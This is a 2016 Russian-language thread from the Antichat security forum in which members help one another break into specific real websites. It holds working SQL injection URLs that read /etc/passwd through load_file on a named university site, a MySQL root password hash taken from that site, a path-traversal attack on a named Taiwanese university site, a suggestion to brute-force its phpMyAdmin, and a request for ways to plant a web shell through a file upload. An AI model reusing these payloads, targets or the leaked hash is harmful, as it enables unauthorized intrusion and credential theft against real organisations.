HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.11.2016, 17:43
qqq1457
Познающий
Регистрация: 13.10.2016
Сообщений: 33
Провел на форуме:
8589

Репутация: 0
По умолчанию

Цитата:
Сообщение от DezMond™  

http://gwps.org/36.0.html?&action=showDetails&showid=72
Как раскрутить? как слепая тоже не крутиться(
Таблица be_users колонка usename
Немогу данные выковырять
havij видит что то http://prnt.sc/d3e4kj

но увы mysql=4.0.27

в ручную пока не могу составить запрос
 
Ответить с цитированием

  #2  
Старый 05.11.2016, 17:47
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию

Цитата:
Сообщение от qqq1457  

1
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+
или
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,load_file(0x2F6574632F706173737764),3 ,4,5,6,7,8,9,10,11,12--+
где 0x2F6574632F706173737764= hex(/etc/passwd)
2
нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является
http://www.naval.iitkgp.ernet.in/me...rd),3,4,5,6,7,8,9,10,11,12+from+mysql.user--+

root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B

всё там нормально
 
Ответить с цитированием

  #3  
Старый 05.11.2016, 17:50
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию

Цитата:
Сообщение от qqq1457  

havij видит что то
http://prnt.sc/d3e4kj
но увы mysql=4.0.27
в ручную пока не могу составить запрос
Это я видел. Должен быть вывод....
 
Ответить с цитированием

  #4  
Старый 05.11.2016, 17:59
qqq1457
Познающий
Регистрация: 13.10.2016
Сообщений: 33
Провел на форуме:
8589

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #5  
Старый 05.11.2016, 18:38
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Спасибо кто откликнулся.

В первом сайте интересен запрос table_name from information_schema.tables where table_name=database()/

в втором сайте интересней чтение файла. Сори а то что сразу не смог задать нормально вопрос.
 
Ответить с цитированием

  #6  
Старый 08.11.2016, 07:19
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию

Всем привет!

На странице есть ckeditor с возможностью загружать файлы на сервер.

- заливать можно всё

- имена файлов переименовывается, так что залить .htaccess не получится

- имена после заливки известны

- php, php3, phtml (возможно и другие, больше не пробовал, боюсь мою кучу говна скоро обнаружат) не выполняются, скачиваются

- shtml открывается, но так же не выполняется (судя по всему там хрен что выполняется)

Свои идеи иссякли, а останавливаться на достигнутом не хочется, так что прошу поделиться идеями, размышлениями на тему заливки рабочего шелла и т.п. вещей.

Не уверен что с html+js можно что-то придумать, может какой perl сгодится или еще что, но в этом я уже не силен.

Да кстати, хоть ckeditor версии 4.0.1, толку от этого нет, т.к. папка samples отсутствует.

И еще проверил pl, чтоб наверняка, тоже понятное дело скачивается.
 
Ответить с цитированием

  #7  
Старый 08.11.2016, 09:17
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
Провел на форуме:
61136

Репутация: 32
По умолчанию

Помогите раскрутить LFI

_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
 
Ответить с цитированием

  #8  
Старый 08.11.2016, 18:50
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902

Репутация: 0
По умолчанию

Цитата:
Сообщение от WallHack  

Помогите раскрутить LFI
_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
?page=file:///etc/passwd
 
Ответить с цитированием

  #9  
Старый 08.11.2016, 18:58
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от ZodiaX  

?page=file:///etc/passwd
Вроде как указал автор работает. Не очень понятно что требуется
 
Ответить с цитированием

  #10  
Старый 08.11.2016, 20:13
qqq1457
Познающий
Регистрация: 13.10.2016
Сообщений: 33
Провел на форуме:
8589

Репутация: 0
По умолчанию

http://lidodo.astro.ncu.edu.tw/phpMyAdmin/index.php есть phpmyadmin можно попробывать пробрутить

версия http://lidodo.astro.ncu.edu.tw/phpMy...tml/index.html
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.